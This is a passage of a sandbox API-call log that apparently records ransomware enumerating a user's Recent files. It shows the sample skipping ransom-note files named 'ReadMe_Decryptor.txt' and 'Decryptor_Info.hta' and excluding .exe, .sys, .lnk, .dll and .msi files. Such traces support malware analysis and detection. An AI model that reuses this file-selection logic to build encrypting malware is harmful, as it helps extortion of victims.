cFileName="6d10pbgI59tZwQc.lnk", cAlternateFileName="6D10PB~1.LNK")) returned 1 [0084.574] lstrcmpW (lpString1="6d10pbgI59tZwQc.lnk", lpString2=".") returned 1 [0084.574] lstrcmpW (lpString1="6d10pbgI59tZwQc.lnk", lpString2="..") returned 1 [0084.574] lstrcmpiW (lpString1="6d10pbgI59tZwQc.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.574] lstrcmpiW (lpString1="6d10pbgI59tZwQc.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.574] PathFindExtensionW (pszPath="6d10pbgI59tZwQc.lnk") returned=".lnk" [0084.574] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.575] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.575] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.575] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3fc2240, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe3fc2240, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe3fc2240, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x3d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="6V7X.flv.lnk", cAlternateFileName="6V7XFL~1.LNK")) returned 1 [0084.575] lstrcmpW (lpString1="6V7X.flv.lnk", lpString2=".") returned 1 [0084.575] lstrcmpW (lpString1="6V7X.flv.lnk", lpString2="..") returned 1 [0084.575] lstrcmpiW (lpString1="6V7X.flv.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.575] lstrcmpiW (lpString1="6V7X.flv.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.575] PathFindExtensionW (pszPath="6V7X.flv.lnk") returned=".lnk" [0084.575] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.575] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.575] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.575] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe36aee60, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe36aee60, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe36d4fc0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x199f, dwReserved0=0x0, dwReserved1=0x0, cFileName="8tNv6sMqzXXl M.ots.lnk", cAlternateFileName="8TNV6S~1.LNK")) returned 1 [0084.575] lstrcmpW (lpString1="8tNv6sMqzXXl M.ots.lnk", lpString2=".") returned 1 [0084.575] lstrcmpW (lpString1="8tNv6sMqzXXl M.ots.lnk", lpString2="..") returned 1 [0084.575] lstrcmpiW (lpString1="8tNv6sMqzXXl M.ots.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.575] lstrcmpiW (lpString1="8tNv6sMqzXXl M.ots.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.575] PathFindExtensionW (pszPath="8tNv6sMqzXXl M.ots.lnk") returned=".lnk" [0084.575] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.575] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.576] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.576] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe445ece0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe445ece0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe445ece0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xa79, dwReserved0=0x0, dwReserved1=0x0, cFileName="8Z-xFMuafWn712Plg.lnk", cAlternateFileName="8Z-XFM~1.LNK")) returned 1 [0084.576] lstrcmpW (lpString1="8Z-xFMuafWn712Plg.lnk", lpString2=".") returned 1 [0084.576] lstrcmpW (lpString1="8Z-xFMuafWn712Plg.lnk", lpString2="..") returned 1 [0084.576] lstrcmpiW (lpString1="8Z-xFMuafWn712Plg.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.576] lstrcmpiW (lpString1="8Z-xFMuafWn712Plg.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.576] PathFindExtensionW (pszPath="8Z-xFMuafWn712Plg.lnk") returned=".lnk" [0084.576] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.576] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.576] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.576] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4f612a0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4f612a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4f87400, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xf5d, dwReserved0=0x0, dwReserved1=0x0, cFileName="984b3N2eS yHPefDX4.mkv.lnk", cAlternateFileName="984B3N~1.LNK")) returned 1 [0084.576] lstrcmpW (lpString1="984b3N2eS yHPefDX4.mkv.lnk", lpString2=".") returned 1 [0084.576] lstrcmpW (lpString1="984b3N2eS yHPefDX4.mkv.lnk", lpString2="..") returned 1 [0084.576] lstrcmpiW (lpString1="984b3N2eS yHPefDX4.mkv.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.576] lstrcmpiW (lpString1="984b3N2eS yHPefDX4.mkv.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.576] PathFindExtensionW (pszPath="984b3N2eS yHPefDX4.mkv.lnk") returned=".lnk" [0084.576] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.576] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.576] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.577] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe51041c0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe51041c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe51041c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x40b, dwReserved0=0x0, dwReserved1=0x0, cFileName="9kbs2_w18IOb i9.lnk", cAlternateFileName="9KBS2_~1.LNK")) returned 1 [0084.577] lstrcmpW (lpString1="9kbs2_w18IOb i9.lnk", lpString2=".") returned 1 [0084.577] lstrcmpW (lpString1="9kbs2_w18IOb i9.lnk", lpString2="..") returned 1 [0084.577] lstrcmpiW (lpString1="9kbs2_w18IOb i9.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.577] lstrcmpiW (lpString1="9kbs2_w18IOb i9.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.577] PathFindExtensionW (pszPath="9kbs2_w18IOb i9.lnk") returned=".lnk" [0084.577] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.577] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.577] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.577] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe49b9e60, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe49b9e60, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe49b9e60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x1463, dwReserved0=0x0, dwReserved1=0x0, cFileName="9q7reT0CzayeF.lnk", cAlternateFileName="9Q7RET~1.LNK")) returned 1 [0084.577] lstrcmpW (lpString1="9q7reT0CzayeF.lnk", lpString2=".") returned 1 [0084.577] lstrcmpW (lpString1="9q7reT0CzayeF.lnk", lpString2="..") returned 1 [0084.577] lstrcmpiW (lpString1="9q7reT0CzayeF.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.577] lstrcmpiW (lpString1="9q7reT0CzayeF.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.577] PathFindExtensionW (pszPath="9q7reT0CzayeF.lnk") returned=".lnk" [0084.577] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.577] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.577] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.577] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3982880, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe3982880, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe3982880, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xa42, dwReserved0=0x0, dwReserved1=0x0, cFileName="a eeK3Cof0F.lnk", cAlternateFileName="AEEK3C~1.LNK")) returned 1 [0084.578] lstrcmpW (lpString1="a eeK3Cof0F.lnk", lpString2=".") returned 1 [0084.578] lstrcmpW (lpString1="a eeK3Cof0F.lnk", lpString2="..") returned 1 [0084.578] lstrcmpiW (lpString1="a eeK3Cof0F.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.578] lstrcmpiW (lpString1="a eeK3Cof0F.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.578] PathFindExtensionW (pszPath="a eeK3Cof0F.lnk") returned=".lnk" [0084.578] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.578] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.578] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.578] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4308080, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4308080, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe432e1e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xa25, dwReserved0=0x0, dwReserved1=0x0, cFileName="a0tepdFCMXP2szAN-.flv.lnk", cAlternateFileName="A0TEPD~1.LNK")) returned 1 [0084.578] lstrcmpW (lpString1="a0tepdFCMXP2szAN-.flv.lnk", lpString2=".") returned 1 [0084.578] lstrcmpW (lpString1="a0tepdFCMXP2szAN-.flv.lnk", lpString2="..") returned 1 [0084.578] lstrcmpiW (lpString1="a0tepdFCMXP2szAN-.flv.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.578] lstrcmpiW (lpString1="a0tepdFCMXP2szAN-.flv.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.578] PathFindExtensionW (pszPath="a0tepdFCMXP2szAN-.flv.lnk") returned=".lnk" [0084.578] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.578] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.578] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.579] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ccbe0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe40ccbe0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe40f2d40, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x1a05, dwReserved0=0x0, dwReserved1=0x0, cFileName="aIsUN6kQ Oe.lnk", cAlternateFileName="AISUN6~1.LNK")) returned 1 [0084.579] lstrcmpW (lpString1="aIsUN6kQ Oe.lnk", lpString2=".") returned 1 [0084.579] lstrcmpW (lpString1="aIsUN6kQ Oe.lnk", lpString2="..") returned 1 [0084.579] lstrcmpiW (lpString1="aIsUN6kQ Oe.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.579] lstrcmpiW (lpString1="aIsUN6kQ Oe.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.579] PathFindExtensionW (pszPath="aIsUN6kQ Oe.lnk") returned=".lnk" [0084.579] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.579] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.579] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.579] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe477e9c0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe477e9c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe477e9c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x142a, dwReserved0=0x0, dwReserved1=0x0, cFileName="aj2kMTvbg.lnk", cAlternateFileName="AJ2KMT~1.LNK")) returned 1 [0084.579] lstrcmpW (lpString1="aj2kMTvbg.lnk", lpString2=".") returned 1 [0084.579] lstrcmpW (lpString1="aj2kMTvbg.lnk", lpString2="..") returned 1 [0084.579] lstrcmpiW (lpString1="aj2kMTvbg.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.579] lstrcmpiW (lpString1="aj2kMTvbg.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.579] PathFindExtensionW (pszPath="aj2kMTvbg.lnk") returned=".lnk" [0084.579] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.580] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.580] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.580] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3fe83a0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe3fe83a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe3fe83a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xec2, dwReserved0=0x0, dwReserved1=0x0, cFileName="amgfd.flv.lnk", cAlternateFileName="AMGFDF~1.LNK")) returned 1 [0084.580] lstrcmpW (lpString1="amgfd.flv.lnk", lpString2=".") returned 1 [0084.580] lstrcmpW (lpString1="amgfd.flv.lnk", lpString2="..") returned 1 [0084.580] lstrcmpiW (lpString1="amgfd.flv.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.580] lstrcmpiW (lpString1="amgfd.flv.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.580] PathFindExtensionW (pszPath="amgfd.flv.lnk") returned=".lnk" [0084.580] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.580] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.580] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.580] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4bce65c0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x4bce65c0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AutomaticDestinations", cAlternateFileName="AUTOMA~1")) returned 1 [0084.580] lstrcmpW (lpString1="AutomaticDestinations", lpString2=".") returned 1 [0084.580] lstrcmpW (lpString1="AutomaticDestinations", lpString2="..") returned 1 [0084.580] lstrlenW (lpString="AutomaticDestinations") returned 21 [0084.580] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpString2="AutomaticDestinations" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations" [0084.580] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\" [0084.581] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned 93 [0084.581] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a920 [0084.581] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.581] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4bce65c0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x4bce65c0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.581] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.581] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.581] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe4a50c70, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x16c96, dwReserved0=0x0, dwReserved1=0x0, cFileName="1b4dd67f29cb1962.automaticDestinations-ms", cAlternateFileName="1B4DD6~1.AUT")) returned 1 [0084.581] lstrcmpW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2=".") returned 1 [0084.581] lstrcmpW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2="..") returned 1 [0084.581] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.581] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2="Decryptor_Info.hta") returned -1 [0084.582] PathFindExtensionW (pszPath="1b4dd67f29cb1962.automaticDestinations-ms") returned=".automaticDestinations-ms" [0084.582] lstrcmpiW (lpString1=".automaticDestinations-ms", lpString2=".exe") returned -1 [0084.582] lstrcmpiW (lpString1=".automaticDestinations-ms", lpString2=".sys") returned -1 [0084.582] lstrcmpiW (lpString1=".automaticDestinations-ms", lpString2=".lnk") returned -1 [0084.582] lstrcmpiW (lpString1=".automaticDestinations-ms", lpString2=".dll") returned -1 [0084.582] lstrcmpiW (lpString1=".automaticDestinations-ms", lpString2=".msi") returned -1 [0084.582] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x780fb8 [0084.582] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x7812e8 [0084.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x780fb8 | out: hHeap=0x6d0000) returned 1 [0084.582] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x110) returned 0x780fb8 [0084.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7812e8 | out: hHeap=0x6d0000) returned 1 [0084.582] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc606a140, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xc606a140, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x80e1f4a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="7e4dca80246863e3.automaticDestinations-ms", cAlternateFileName="7E4DCA~1.AUT")) returned 1 [0084.582] lstrcmpW (lpString1="7e4dca80246863e3.automaticDestinations-ms", lpString2=".") returned 1 [0084.582] lstrcmpW (lpString1="7e4dca80246863e3.automaticDestinations-ms", lpString2="..") returned 1 [0084.582] lstrcmpiW (lpString1="7e4dca80246863e3.automaticDestinations-ms", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.582] lstrcmpiW (lpString1="7e4dca80246863e3.automaticDestinations-ms", lpString2="Decryptor_Info.hta") returned -1 [0084.582] PathFindExtensionW (pszPath="7e4dca80246863e3.automaticDestinations-ms") returned=".automaticDestinations-ms" [0084.583] lstrcmpiW (lpString1=".automaticDestinations-ms", lpString2=".exe") returned -1 [0084.583] lstrcmpiW (lpString1=".automaticDestinations-ms", lpString2=".sys") returned -1 [0084.583] lstrcmpiW (lpString1=".automaticDestinations-ms", lpString2=".lnk") returned -1 [0084.583] lstrcmpiW (lpString1=".automaticDestinations-ms", lpString2=".dll") returned -1 [0084.583] lstrcmpiW (lpString1=".automaticDestinations-ms", lpString2=".msi") returned -1 [0084.583] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x7812e8 [0084.583] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x7813b0 [0084.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7812e8 | out: hHeap=0x6d0000) returned 1 [0084.583] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x110) returned 0x7814d8 [0084.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7813b0 | out: hHeap=0x6d0000) returned 1 [0084.583] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bce65c0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x4bce65c0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x4bce4e50, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="eb282ead62b4db87.automaticDestinations-ms", cAlternateFileName="EB282E~1.AUT")) returned 1 [0084.583] lstrcmpW (lpString1="eb282ead62b4db87.automaticDestinations-ms", lpString2=".") returned 1 [0084.583] lstrcmpW (lpString1="eb282ead62b4db87.automaticDestinations-ms", lpString2="..") returned 1 [0084.583] lstrcmpiW (lpString1="eb282ead62b4db87.automaticDestinations-ms", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.583] lstrcmpiW (lpString1="eb282ead62b4db87.automaticDestinations-ms", lpString2="Decryptor_Info.hta") returned 1 [0084.583] PathFindExtensionW (pszPath="eb282ead62b4db87.automaticDestinations-ms") returned=".automaticDestinations-ms" [0084.583] lstrcmpiW (lpString1=".automaticDestinations-ms", lpString2=".exe") returned -1 [0084.583] lstrcmpiW (lpString1=".automaticDestinations-ms", lpString2=".sys") returned -1 [0084.583] lstrcmpiW (lpString1=".automaticDestinations-ms", lpString2=".lnk") returned -1 [0084.584] lstrcmpiW (lpString1=".automaticDestinations-ms", lpString2=".dll") returned -1 [0084.584] lstrcmpiW (lpString1=".automaticDestinations-ms", lpString2=".msi") returned -1 [0084.584] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x7812e8 [0084.584] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x7813b0 [0084.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7812e8 | out: hHeap=0x6d0000) returned 1 [0084.584] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x110) returned 0x7815f0 [0084.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7813b0 | out: hHeap=0x6d0000) returned 1 [0084.584] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bce65c0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x4bce65c0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x4bce4e50, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="eb282ead62b4db87.automaticDestinations-ms", cAlternateFileName="EB282E~1.AUT")) returned 0 [0084.584] FindClose (in: hFindFile=0x72a920 | out: hFindFile=0x72a920) returned 1 [0084.584] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe506bc40, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe506bc40, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe506bc40, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xa4d, dwReserved0=0x0, dwReserved1=0x0, cFileName="bfc017GN5tmh.lnk", cAlternateFileName="BFC017~1.LNK")) returned 1 [0084.584] lstrcmpW (lpString1="bfc017GN5tmh.lnk", lpString2=".") returned 1 [0084.584] lstrcmpW (lpString1="bfc017GN5tmh.lnk", lpString2="..") returned 1 [0084.584] lstrcmpiW (lpString1="bfc017GN5tmh.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.584] lstrcmpiW (lpString1="bfc017GN5tmh.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.584] PathFindExtensionW (pszPath="bfc017GN5tmh.lnk") returned=".lnk" [0084.584] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.585] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.585] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.585] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4ff9820, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4ff9820, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4ff9820, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x9ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="bFIWOe.flv.lnk", cAlternateFileName="BFIWOE~1.LNK")) returned 1 [0084.585] lstrcmpW (lpString1="bFIWOe.flv.lnk", lpString2=".") returned 1 [0084.585] lstrcmpW (lpString1="bFIWOe.flv.lnk", lpString2="..") returned 1 [0084.585] 